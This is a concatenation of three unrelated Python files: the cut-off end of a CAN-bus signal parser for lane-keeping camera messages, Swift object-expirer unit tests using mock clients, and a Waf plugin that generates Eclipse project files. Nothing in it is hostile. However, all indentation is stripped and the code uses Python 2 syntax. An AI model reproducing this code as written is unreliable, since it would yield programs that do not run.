("LINE_NOT_VISIBLE", "CAM_LKAS"),
("BIT_1", "CAM_LKAS"),
("ERR_BIT_2", "CAM_LKAS"),
("STEERING_ANGLE", "CAM_LKAS"),
("ANGLE_ENABLED", "CAM_LKAS"),
("CHKSUM", "CAM_LKAS"),
("LINE_VISIBLE", "CAM_LANEINFO"),
("LINE_NOT_VISIBLE", "CAM_LANEINFO"),
("LANE_LINES", "CAM_LANEINFO"),
("BIT1", "CAM_LANEINFO"),
("BIT2", "CAM_LANEINFO"),
("BIT3", "CAM_LANEINFO"),
("NO_ERR_BIT", "CAM_LANEINFO"),
("S1", "CAM_LANEINFO"),
("S1_HBEAM", "CAM_LANEINFO"),
]
checks += [
# sig_address, frequency
("CAM_LANEINFO", 2),
("CAM_LKAS", 16),
]
return CANParser(DBC[CP.carFingerprint]["pt"], signals, checks, 2)
|
|
# Copyright (c) 2011 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import urllib
from time import time
from unittest import main, TestCase
from test.unit import FakeLogger
from copy import deepcopy
import mock
from swift.common import internal_client
from swift.obj import expirer
def not_random():
return 0.5
last_not_sleep = 0
def not_sleep(seconds):
global last_not_sleep
last_not_sleep = seconds
class TestObjectExpirer(TestCase):
maxDiff = None
def setUp(self):
global not_sleep
self.old_loadapp = internal_client.loadapp
self.old_sleep = internal_client.sleep
internal_client.loadapp = lambda x: None
internal_client.sleep = not_sleep
def teardown(self):
internal_client.sleep = self.old_sleep
internal_client.loadapp = self.loadapp
def test_get_process_values_from_kwargs(self):
x = expirer.ObjectExpirer({})
vals = {
'processes': 5,
'process': 1,
}
self.assertEqual((5, 1), x.get_process_values(vals))
def test_get_process_values_from_config(self):
vals = {
'processes': 5,
'process': 1,
}
x = expirer.ObjectExpirer(vals)
self.assertEqual((5, 1), x.get_process_values({}))
def test_get_process_values_negative_process(self):
vals = {
'processes': 5,
'process': -1,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_get_process_values_negative_processes(self):
vals = {
'processes': -5,
'process': 1,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_get_process_values_process_greater_than_processes(self):
vals = {
'processes': 5,
'process': 7,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_init_concurrency_too_small(self):
conf = {
'concurrency': 0,
}
self.assertRaises(ValueError, expirer.ObjectExpirer, conf)
conf = {
'concurrency': -1,
}
self.assertRaises(ValueError, expirer.ObjectExpirer, conf)
def test_process_based_concurrency(self):
class ObjectExpirer(expirer.ObjectExpirer):
def __init__(self, conf):
super(ObjectExpirer, self).__init__(conf)
self.processes = 3
self.deleted_objects = {}
def delete_object(self, actual_obj, timestamp, container, obj):
if not container in self.deleted_objects:
self.deleted_objects[container] = set()
self.deleted_objects[container].add(obj)
class InternalClient(object):
def __init__(self, containers):
self.containers = containers
def get_account_info(self, *a, **kw):
return len(self.containers.keys()), \
sum([len(self.containers[x]) for x in self.containers])
def iter_containers(self, *a, **kw):
return [{'name': x} for x in self.containers.keys()]
def iter_objects(self, account, container):
return [{'name': x} for x in self.containers[container]]
def delete_container(*a, **kw):
pass
containers = {
0: set('1-one 2-two 3-three'.split()),
1: set('2-two 3-three 4-four'.split()),
2: set('5-five 6-six'.split()),
3: set('7-seven'.split()),
}
x = ObjectExpirer({})
x.swift = InternalClient(containers)
deleted_objects = {}
for i in xrange(0, 3):
x.process = i
x.run_once()
self.assertNotEqual(deleted_objects, x.deleted_objects)
deleted_objects = deepcopy(x.deleted_objects)
self.assertEqual(containers, deleted_objects)
def test_delete_object(self):
class InternalClient(object):
def __init__(self, test, account, container, obj):
self.test = test
self.account = account
self.container = container
self.obj = obj
self.delete_object_called = False
def delete_object(self, account, container, obj):
self.test.assertEqual(self.account, account)
self.test.assertEqual(self.container, container)
self.test.assertEqual(self.obj, obj)
self.delete_object_called = True
class DeleteActualObject(object):
def __init__(self, test, actual_obj, timestamp):
self.test = test
self.actual_obj = actual_obj
self.timestamp = timestamp
self.called = False
def __call__(self, actual_obj, timestamp):
self.test.assertEqual(self.actual_obj, actual_obj)
self.test.assertEqual(self.timestamp, timestamp)
self.called = True
container = 'container'
obj = 'obj'
actual_obj = 'actual_obj'
timestamp = 'timestamp'
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = \
InternalClient(self, x.expiring_objects_account, container, obj)
x.delete_actual_object = \
DeleteActualObject(self, actual_obj, timestamp)
x.delete_object(actual_obj, timestamp, container, obj)
self.assertTrue(x.swift.delete_object_called)
self.assertTrue(x.delete_actual_object.called)
def test_report(self):
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.report()
self.assertEqual(x.logger.log_dict['info'], [])
x.logger._clear()
x.report(final=True)
self.assertTrue('completed' in x.logger.log_dict['info'][-1][0][0],
x.logger.log_dict['info'])
self.assertTrue('so far' not in x.logger.log_dict['info'][-1][0][0],
x.logger.log_dict['info'])
x.logger._clear()
x.report_last_time = time() - x.report_interval
x.report()
self.assertTrue('completed' not in x.logger.log_dict['info'][-1][0][0],
x.logger.log_dict['info'])
self.assertTrue('so far' in x.logger.log_dict['info'][-1][0][0],
x.logger.log_dict['info'])
def test_run_once_nothing_to_do(self):
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = 'throw error because a string does not have needed methods'
x.run_once()
self.assertEqual(x.logger.log_dict['exception'],
[(("Unhandled exception",), {},
"'str' object has no attribute "
"'get_account_info'")])
def test_run_once_calls_report(self):
class InternalClient(object):
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(*a, **kw):
return []
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = InternalClient()
x.run_once()
self.assertEqual(
x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 0 objects expired',), {})])
def test_container_timestamp_break(self):
class InternalClient(object):
def __init__(self, containers):
self.containers = containers
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def iter_objects(*a, **kw):
raise Exception('This should not have been called')
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = InternalClient([{'name': str(int(time() + 86400))}])
x.run_once()
for exccall in x.logger.log_dict['exception']:
self.assertTrue(
'This should not have been called' not in exccall[0][0])
self.assertEqual(
x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 0 objects expired',), {})])
# Reverse test to be sure it still would blow up the way expected.
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = InternalClient([{'name': str(int(time() - 86400))}])
x.run_once()
self.assertEqual(x.logger.log_dict['exception'],
[(('Unhandled exception',), {},
str(Exception('This should not have been called')))])
def test_object_timestamp_break(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def should_not_be_called(*a, **kw):
raise Exception('This should not have been called')
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = InternalClient([{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % int(time() + 86400)}])
x.run_once()
for exccall in x.logger.log_dict['exception']:
self.assertTrue(
'This should not have been called' not in exccall[0][0])
self.assertEqual(x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 0 objects expired',), {})])
# Reverse test to be sure it still would blow up the way expected.
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
ts = int(time() - 86400)
x.swift = InternalClient([{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
x.delete_actual_object = should_not_be_called
x.run_once()
excswhiledeleting = []
for exccall in x.logger.log_dict['exception']:
if exccall[0][0].startswith('Exception while deleting '):
excswhiledeleting.append(exccall[0][0])
self.assertEqual(excswhiledeleting,
['Exception while deleting object %d %d-actual-obj '
'This should not have been called' % (ts, ts)])
def test_failed_delete_keeps_entry(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def delete_object(*a, **kw):
raise Exception('This should not have been called')
def iter_objects(self, *a, **kw):
return self.objects
def deliberately_blow_up(actual_obj, timestamp):
raise Exception('failed to delete actual object')
def should_not_get_called(container, obj):
raise Exception('This should not have been called')
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.iter_containers = lambda: [str(int(time() - 86400))]
ts = int(time() - 86400)
x.delete_actual_object = deliberately_blow_up
x.swift = InternalClient([{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
x.run_once()
excswhiledeleting = []
for exccall in x.logger.log_dict['exception']:
if exccall[0][0].startswith('Exception while deleting '):
excswhiledeleting.append(exccall[0][0])
self.assertEqual(excswhiledeleting,
['Exception while deleting object %d %d-actual-obj '
'failed to delete actual object' % (ts, ts)])
self.assertEqual(x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 0 objects expired',), {})])
# Reverse test to be sure it still would blow up the way expected.
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
ts = int(time() - 86400)
x.delete_actual_object = lambda o, t: None
x.swift = InternalClient([{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
x.run_once()
excswhiledeleting = []
for exccall in x.logger.log_dict['exception']:
if exccall[0][0].startswith('Exception while deleting '):
excswhiledeleting.append(exccall[0][0])
self.assertEqual(excswhiledeleting,
['Exception while deleting object %d %d-actual-obj This should '
'not have been called' % (ts, ts)])
def test_success_gets_counted(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.delete_actual_object = lambda o, t: None
self.assertEqual(x.report_objects, 0)
x.swift = InternalClient([{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % int(time() - 86400)}])
x.run_once()
self.assertEqual(x.report_objects, 1)
self.assertEqual(x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 1 objects expired',), {})])
def test_delete_actual_object_does_not_get_unicode(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
got_unicode = [False]
def delete_actual_object_test_for_unicode(actual_obj, timestamp):
if isinstance(actual_obj, unicode):
got_unicode[0] = True
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.delete_actual_object = delete_actual_object_test_for_unicode
self.assertEqual(x.report_objects, 0)
x.swift = InternalClient([{'name': str(int(time() - 86400))}],
[{'name': u'%d-actual-obj' % int(time() - 86400)}])
x.run_once()
self.assertEqual(x.report_objects, 1)
self.assertEqual(x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 1 objects expired',), {})])
self.assertFalse(got_unicode[0])
def test_failed_delete_continues_on(self):
class InternalClient(object):
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
raise Exception('failed to delete container')
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def fail_delete_actual_object(actual_obj, timestamp):
raise Exception('failed to delete actual object')
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
cts = int(time() - 86400)
ots = int(time() - 86400)
containers = [
{'name': str(cts)},
{'name': str(cts + 1)},
]
objects = [
{'name': '%d-actual-obj' % ots},
{'name': '%d-next-obj' % ots}
]
x.swift = InternalClient(containers, objects)
x.delete_actual_object = fail_delete_actual_object
x.run_once()
excswhiledeleting = []
for exccall in x.logger.log_dict['exception']:
if exccall[0][0].startswith('Exception while deleting '):
excswhiledeleting.append(exccall[0][0])
self.assertEqual(sorted(excswhiledeleting), sorted([
'Exception while deleting object %d %d-actual-obj failed to '
'delete actual object' % (cts, ots),
'Exception while deleting object %d %d-next-obj failed to '
'delete actual object' % (cts, ots),
'Exception while deleting object %d %d-actual-obj failed to '
'delete actual object' % (cts + 1, ots),
'Exception while deleting object %d %d-next-obj failed to '
'delete actual object' % (cts + 1, ots),
'Exception while deleting container %d failed to delete '
'container' % (cts,),
'Exception while deleting container %d failed to delete '
'container' % (cts + 1,)]))
self.assertEqual(x.logger.log_dict['info'],
[(('Pass beginning; 1 possible containers; '
'2 possible objects',), {}),
(('Pass completed in 0s; 0 objects expired',), {})])
def test_run_forever_initial_sleep_random(self):
global last_not_sleep
def raise_system_exit():
raise SystemExit('test_run_forever')
interval = 1234
x = expirer.ObjectExpirer({'__file__': 'unit_test',
'interval': interval})
orig_random = expirer.random
orig_sleep = expirer.sleep
try:
expirer.random = not_random
expirer.sleep = not_sleep
x.run_once = raise_system_exit
x.run_forever()
except SystemExit, err:
pass
finally:
expirer.random = orig_random
expirer.sleep = orig_sleep
self.assertEqual(str(err), 'test_run_forever')
self.assertEqual(last_not_sleep, 0.5 * interval)
def test_run_forever_catches_usual_exceptions(self):
raises = [0]
def raise_exceptions():
raises[0] += 1
if raises[0] < 2:
raise Exception('exception %d' % raises[0])
raise SystemExit('exiting exception %d' % raises[0])
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
orig_sleep = expirer.sleep
try:
expirer.sleep = not_sleep
x.run_once = raise_exceptions
x.run_forever()
except SystemExit, err:
pass
finally:
expirer.sleep = orig_sleep
self.assertEqual(str(err), 'exiting exception 2')
self.assertEqual(x.logger.log_dict['exception'],
[(('Unhandled exception',), {},
'exception 1')])
def test_delete_actual_object(self):
got_env = [None]
def fake_app(env, start_response):
got_env[0] = env
start_response('204 No Content', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda x: fake_app
x = expirer.ObjectExpirer({})
ts = '1234'
x.delete_actual_object('/path/to/object', ts)
self.assertEqual(got_env[0]['HTTP_X_IF_DELETE_AT'], ts)
def test_delete_actual_object_nourlquoting(self):
# delete_actual_object should not do its own url quoting because
# internal client's make_request handles that.
got_env = [None]
def fake_app(env, start_response):
got_env[0] = env
start_response('204 No Content', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda x: fake_app
x = expirer.ObjectExpirer({})
ts = '1234'
x.delete_actual_object('/path/to/object name', ts)
self.assertEqual(got_env[0]['HTTP_X_IF_DELETE_AT'], ts)
self.assertEqual(got_env[0]['PATH_INFO'], '/v1/path/to/object name')
def test_delete_actual_object_handles_404(self):
def fake_app(env, start_response):
start_response('404 Not Found', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda x: fake_app
x = expirer.ObjectExpirer({})
x.delete_actual_object('/path/to/object', '1234')
def test_delete_actual_object_handles_412(self):
def fake_app(env, start_response):
start_response('412 Precondition Failed',
[('Content-Length', '0')])
return []
internal_client.loadapp = lambda x: fake_app
x = expirer.ObjectExpirer({})
x.delete_actual_object('/path/to/object', '1234')
def test_delete_actual_object_does_not_handle_odd_stuff(self):
def fake_app(env, start_response):
start_response('503 Internal Server Error',
[('Content-Length', '0')])
return []
internal_client.loadapp = lambda x: fake_app
x = expirer.ObjectExpirer({})
exc = None
try:
x.delete_actual_object('/path/to/object', '1234')
except Exception, err:
exc = err
finally:
pass
self.assertEqual(503, exc.resp.status_int)
def test_delete_actual_object_quotes(self):
name = 'this name should get quoted'
timestamp = '1366063156.863045'
x = expirer.ObjectExpirer({})
x.swift.make_request = mock.MagicMock()
x.delete_actual_object(name, timestamp)
x.swift.make_request.assert_called_once()
self.assertEqual(x.swift.make_request.call_args[0][1],
'/v1/' + urllib.quote(name))
if __name__ == '__main__':
main()
|
|
#! /usr/bin/env python
# encoding: utf-8
# Eclipse CDT 5.0 generator for Waf
# Richard Quirk 2009-1011 (New BSD License)
# Thomas Nagy 2011 (ported to Waf 1.6)
"""
Usage:
def options(opt):
opt.load('eclipse')
$ waf configure eclipse
"""
import sys, os
from waflib import Utils, Logs, Context, Build, TaskGen, Scripting, Errors, Node
from xml.dom.minidom import Document
STANDARD_INCLUDES = [ '/usr/local/include', '/usr/include' ]
oe_cdt = 'org.eclipse.cdt'
cdt_mk = oe_cdt + '.make.core'
cdt_core = oe_cdt + '.core'
cdt_bld = oe_cdt + '.build.core'
extbuilder_dir = '.externalToolBuilders'
extbuilder_name = 'Waf_Builder.launch'
class eclipse(Build.BuildContext):
cmd = 'eclipse'
fun = Scripting.default_cmd
def execute(self):
"""
Entry point
"""
self.restore()
if not self.all_envs:
self.load_envs()
self.recurse([self.run_dir])
appname = getattr(Context.g_module, Context.APPNAME, os.path.basename(self.srcnode.abspath()))
self.create_cproject(appname, pythonpath=self.env['ECLIPSE_PYTHON_PATH'])
# Helper to dump the XML document content to XML with UTF-8 encoding
def write_conf_to_xml(self, filename, document):
self.srcnode.make_node(filename).write(document.toprettyxml(encoding='UTF-8'), flags='wb')
def create_cproject(self, appname, workspace_includes=[], pythonpath=[]):
"""
Create the Eclipse CDT .project and .cproject files
@param appname The name that will appear in the Project Explorer
@param build The BuildContext object to extract includes from
@param workspace_includes Optional project includes to prevent
"Unresolved Inclusion" errors in the Eclipse editor
@param pythonpath Optional project specific python paths
"""
hasc = hasjava = haspython = False
source_dirs = []
cpppath = self.env['CPPPATH']
javasrcpath = []
javalibpath = []
includes = STANDARD_INCLUDES
if sys.platform != 'win32':
cc = self.env.CC or self.env.CXX
if cc:
cmd = cc + ['-xc++', '-E', '-Wp,-v', '-']
try:
gccout = self.cmd_and_log(cmd, output=Context.STDERR, quiet=Context.BOTH, input='\n'.encode()).splitlines()
except Errors.WafError:
pass
else:
includes = []
for ipath in gccout:
if ipath.startswith(' /'):
includes.append(ipath[1:])
cpppath += includes
Logs.warn('Generating Eclipse CDT project files')
for g in self.groups:
for tg in g:
if not isinstance(tg, TaskGen.task_gen):
continue
tg.post()
# Add local Python modules paths to configuration so object resolving will work in IDE
# This may also contain generated files (ie. pyqt5 or protoc) that get picked from build
if 'py' in tg.features:
pypath = tg.path.relpath()
py_installfrom = getattr(tg, 'install_from', None)
if isinstance(py_installfrom, Node.Node):
pypath = py_installfrom.path_from(self.root.make_node(self.top_dir))
if pypath not in pythonpath:
pythonpath.append(pypath)
haspython = True
# Add Java source directories so object resolving works in IDE
# This may also contain generated files (ie. protoc) that get picked from build
if 'javac' in tg.features:
java_src = tg.path.relpath()
java_srcdir = getattr(tg.javac_task, 'srcdir', None)
if java_srcdir:
if isinstance(java_srcdir, Node.Node):
java_srcdir = [java_srcdir]
for x in Utils.to_list(java_srcdir):
x = x.path_from(self.root.make_node(self.top_dir))
if x not in javasrcpath:
javasrcpath.append(x)
else:
if java_src not in javasrcpath:
javasrcpath.append(java_src)
hasjava = True
# Check if there are external dependencies and add them as external jar so they will be resolved by Eclipse
usedlibs=getattr(tg, 'use', [])
for x in Utils.to_list(usedlibs):
for cl in Utils.to_list(tg.env['CLASSPATH_'+x]):
if cl not in javalibpath:
javalibpath.append(cl)
if not getattr(tg, 'link_task', None):
continue
features = Utils.to_list(getattr(tg, 'features', ''))
is_cc = 'c' in features or 'cxx' in features
incnodes = tg.to_incnodes(tg.to_list(getattr(tg, 'includes', [])) + tg.env['INCLUDES'])
for p in incnodes:
path = p.path_from(self.srcnode)
if (path.startswith("/")):
cpppath.append(path)
else:
workspace_includes.append(path)
if is_cc and path not in source_dirs:
source_dirs.append(path)
hasc = True
waf_executable = os.path.abspath(sys.argv[0])
project = self.impl_create_project(sys.executable, appname, hasc, hasjava, haspython, waf_executable)
self.write_conf_to_xml('.project', project)
if hasc:
project = self.impl_create_cproject(sys.executable, waf_executable, appname, workspace_includes, cpppath, source_dirs)
self.write_conf_to_xml('.cproject', project)
if haspython:
project = self.impl_create_pydevproject(sys.path, pythonpath)
self.write_conf_to_xml('.pydevproject', project)
if hasjava:
project = self.impl_create_javaproject(javasrcpath, javalibpath)
self.write_conf_to_xml('.classpath', project)
def impl_create_project(self, executable, appname, hasc, hasjava, haspython, waf_executable):
doc = Document()
projectDescription = doc.createElement('projectDescription')
self.add(doc, projectDescription, 'name', appname)
self.add(doc, projectDescription, 'comment')
self.add(doc, projectDescription, 'projects')
buildSpec = self.add(doc, projectDescription, 'buildSpec')
buildCommand = self.add(doc, buildSpec, 'buildCommand')
self.add(doc, buildCommand, 'triggers', 'clean,full,incremental,')
arguments = self.add(doc, buildCommand, 'arguments')
dictionaries = {}
# If CDT is present, instruct this one to call waf as it is more flexible (separate build/clean ...)
if hasc:
self.add(doc, buildCommand, 'name', oe_cdt + '.managedbuilder.core.genmakebuilder')
# the default make-style targets are overwritten by the .cproject values
dictionaries = {
cdt_mk + '.contents': cdt_mk + '.activeConfigSettings',
cdt_mk + '.enableAutoBuild': 'false',
cdt_mk + '.enableCleanBuild': 'true',
cdt_mk + '.enableFullBuild': 'true',
}
else:
# Otherwise for Java/Python an external builder tool is created that will call waf build
self.add(doc, buildCommand, 'name', 'org.eclipse.ui.externaltools.ExternalToolBuilder')
dictionaries = {
'LaunchConfigHandle': '<project>/%s/%s'%(extbuilder_dir, extbuilder_name),
}
# The definition is in a separate directory XML file
try:
os.mkdir(extbuilder_dir)
except OSError:
pass # Ignore error if already exists
# Populate here the external builder XML calling waf
builder = Document()
launchConfiguration = doc.createElement('launchConfiguration')
launchConfiguration.setAttribute('type', 'org.eclipse.ui.externaltools.ProgramBuilderLaunchConfigurationType')
self.add(doc, launchConfiguration, 'booleanAttribute', {'key': 'org.eclipse.debug.ui.ATTR_LAUNCH_IN_BACKGROUND', 'value': 'false'})
self.add(doc, launchConfiguration, 'booleanAttribute', {'key': 'org.eclipse.ui.externaltools.ATTR_TRIGGERS_CONFIGURED', 'value': 'true'})
self.add(doc, launchConfiguration, 'stringAttribute', {'key': 'org.eclipse.ui.externaltools.ATTR_LOCATION', 'value': waf_executable})
self.add(doc, launchConfiguration, 'stringAttribute', {'key': 'org.eclipse.ui.externaltools.ATTR_RUN_BUILD_KINDS', 'value': 'full,incremental,'})
self.add(doc, launchConfiguration, 'stringAttribute', {'key': 'org.eclipse.ui.externaltools.ATTR_TOOL_ARGUMENTS', 'value': 'build'})
self.add(doc, launchConfiguration, 'stringAttribute', {'key': 'org.eclipse.ui.externaltools.ATTR_WORKING_DIRECTORY', 'value': '${project_loc}'})
builder.appendChild(launchConfiguration)
# And write the XML to the file references before
self.write_conf_to_xml('%s%s%s'%(extbuilder_dir, os.path.sep, extbuilder_name), builder)
for k, v in dictionaries.items():
self.addDictionary(doc, arguments, k, v)
natures = self.add(doc, projectDescription, 'natures')
if hasc:
nature_list = """
core.ccnature
managedbuilder.core.ScannerConfigNature
managedbuilder.core.managedBuildNature
core.cnature
""".split()
for n in nature_list:
self.add(doc, natures, 'nature', oe_cdt + '.' + n)
if haspython:
self.add(doc, natures, 'nature', 'org.python.pydev.pythonNature')
if hasjava:
self.add(doc, natures, 'nature', 'org.eclipse.jdt.core.javanature')
doc.appendChild(projectDescription)
return doc
def impl_create_cproject(self, executable, waf_executable, appname, workspace_includes, cpppath, source_dirs=[]):
doc = Document()
doc.appendChild(doc.createProcessingInstruction('fileVersion', '4.0.0'))
cconf_id = cdt_core + '.default.config.1'
cproject = doc.createElement('cproject')
storageModule = self.add(doc, cproject, 'storageModule',
{'moduleId': cdt_core + '.settings'})
cconf = self.add(doc, storageModule, 'cconfiguration', {'id':cconf_id})
storageModule = self.add(doc, cconf, 'storageModule',
{'buildSystemId': oe_cdt + '.managedbuilder.core.configurationDataProvider',
'id': cconf_id,
'moduleId': cdt_core + '.settings',
'name': 'Default'})
self.add(doc, storageModule, 'externalSettings')
extensions = self.add(doc, storageModule, 'extensions')
extension_list = """
VCErrorParser
MakeErrorParser
GCCErrorParser
GASErrorParser
GLDErrorParser
""".split()
self.add(doc, extensions, 'extension', {'id': cdt_core + '.ELF', 'point':cdt_core + '.BinaryParser'})
for e in extension_list:
self.add(doc, extensions, 'extension', {'id': cdt_core + '.' + e, 'point':cdt_core + '.ErrorParser'})
storageModule = self.add(doc, cconf, 'storageModule',
{'moduleId': 'cdtBuildSystem', 'version': '4.0.0'})
config = self.add(doc, storageModule, 'configuration',
{'artifactName': appname,
'id': cconf_id,
'name': 'Default',
'parent': cdt_bld + '.prefbase.cfg'})
folderInfo = self.add(doc, config, 'folderInfo',
{'id': cconf_id+'.', 'name': '/', 'resourcePath': ''})
toolChain = self.add(doc, folderInfo, 'toolChain',
{'id': cdt_bld + '.prefbase.toolchain.1',
'name': 'No ToolChain',
'resourceTypeBasedDiscovery': 'false',
'superClass': cdt_bld + '.prefbase.toolchain'})
self.add(doc, toolChain, 'targetPlatform', {'binaryParser': 'org.eclipse.cdt.core.ELF', 'id': cdt_bld + '.prefbase.toolchain.1', 'name': ''})
waf_build = '"%s" %s'%(waf_executable, eclipse.fun)
waf_clean = '"%s" clean'%(waf_executable)
self.add(doc, toolChain, 'builder',
{'autoBuildTarget': waf_build,
'command': executable,
'enableAutoBuild': 'false',
'cleanBuildTarget': waf_clean,
'enableIncrementalBuild': 'true',
'id': cdt_bld + '.settings.default.builder.1',
'incrementalBuildTarget': waf_build,
'managedBuildOn': 'false',
'name': 'Gnu Make Builder',
'superClass': cdt_bld + '.settings.default.builder'})
tool_index = 1;
for tool_name in ("Assembly", "GNU C++", "GNU C"):
tool = self.add(doc, toolChain, 'tool',
{'id': cdt_bld + '.settings.holder.' + str(tool_index),
'name': tool_name,
'superClass': cdt_bld + '.settings.holder'})
if cpppath or workspace_includes:
incpaths = cdt_bld + '.settings.holder.incpaths'
option = self.add(doc, tool, 'option',
{'id': incpaths + '.' + str(tool_index),
'name': 'Include Paths',
'superClass': incpaths,
'valueType': 'includePath'})
for i in workspace_includes:
self.add(doc, option, 'listOptionValue',
{'builtIn': 'false',
'value': '"${workspace_loc:/%s/%s}"'%(appname, i)})
for i in cpppath:
self.add(doc, option, 'listOptionValue',
{'builtIn': 'false',
'value': '"%s"'%(i)})
if tool_name == "GNU C++" or tool_name == "GNU C":
self.add(doc,tool,'inputType',{ 'id':'org.eclipse.cdt.build.core.settings.holder.inType.' + str(tool_index), \
'languageId':'org.eclipse.cdt.core.gcc' if tool_name == "GNU C" else 'org.eclipse.cdt.core.g++','languageName':tool_name, \
'sourceContentType':'org.eclipse.cdt.core.cSource,org.eclipse.cdt.core.cHeader', \
'superClass':'org.eclipse.cdt.build.core.settings.holder.inType' })
tool_index += 1
if source_dirs:
sourceEntries = self.add(doc, config, 'sourceEntries')
for i in source_dirs:
self.add(doc, sourceEntries, 'entry',
{'excluding': i,
'flags': 'VALUE_WORKSPACE_PATH|RESOLVED',
'kind': 'sourcePath',
'name': ''})
self.add(doc, sourceEntries, 'entry',
{
'flags': 'VALUE_WORKSPACE_PATH|RESOLVED',
'kind': 'sourcePath',
'name': i})
storageModule = self.add(doc, cconf, 'storageModule',
{'moduleId': cdt_mk + '.buildtargets'})
buildTargets = self.add(doc, storageModule, 'buildTargets')
def addTargetWrap(name, runAll):
return self.addTarget(doc, buildTargets, executable, name,
'"%s" %s'%(waf_executable, name), runAll)
addTargetWrap('configure', True)
addTargetWrap('dist', False)
addTargetWrap('install', False)
addTargetWrap('check', False)
storageModule = self.add(doc, cproject, 'storageModule',
{'moduleId': 'cdtBuildSystem',
'version': '4.0.0'})
self.add(doc, storageModule, 'project', {'id': '%s.null.1'%appname, 'name': appname})
doc.appendChild(cproject)
return doc
def impl_create_pydevproject(self, system_path, user_path):
# create a pydevproject file
doc = Document()
doc.appendChild(doc.createProcessingInstruction('eclipse-pydev', 'version="1.0"'))
pydevproject = doc.createElement('pydev_project')
prop = self.add(doc, pydevproject,
'pydev_property',
'python %d.%d'%(sys.version_info[0], sys.version_info[1]))
prop.setAttribute('name', 'org.python.pydev.PYTHON_PROJECT_VERSION')
prop = self.add(doc, pydevproject, 'pydev_property', 'Default')
prop.setAttribute('name', 'org.python.pydev.PYTHON_PROJECT_INTERPRETER')
# add waf's paths
wafadmin = [p for p in system_path if p.find('wafadmin') != -1]
if wafadmin:
prop = self.add(doc, pydevproject, 'pydev_pathproperty',
{'name':'org.python.pydev.PROJECT_EXTERNAL_SOURCE_PATH'})
for i in wafadmin:
self.add(doc, prop, 'path', i)
if user_path:
prop = self.add(doc, pydevproject, 'pydev_pathproperty',
{'name':'org.python.pydev.PROJECT_SOURCE_PATH'})
for i in user_path:
self.add(doc, prop, 'path', '/${PROJECT_DIR_NAME}/'+i)
doc.appendChild(pydevproject)
return doc
